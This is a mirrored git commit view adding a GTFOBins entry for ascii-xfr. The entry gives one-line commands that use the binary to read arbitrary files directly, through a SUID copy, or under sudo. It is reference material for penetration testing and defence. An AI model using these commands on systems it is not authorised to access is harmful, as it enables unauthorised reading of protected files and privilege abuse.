mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-07-26 04:05:40 +02:00
15
_gtfobins/ascii-xfr.md
Normal file
15
_gtfobins/ascii-xfr.md
Normal file
@@ -0,0 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
ascii-xfr -ns "$LFILE"
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./ascii-xfr -ns "$LFILE"
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo ascii-xfr -ns "$LFILE"
|
||||
---
|
Reference in New Issue
Block a user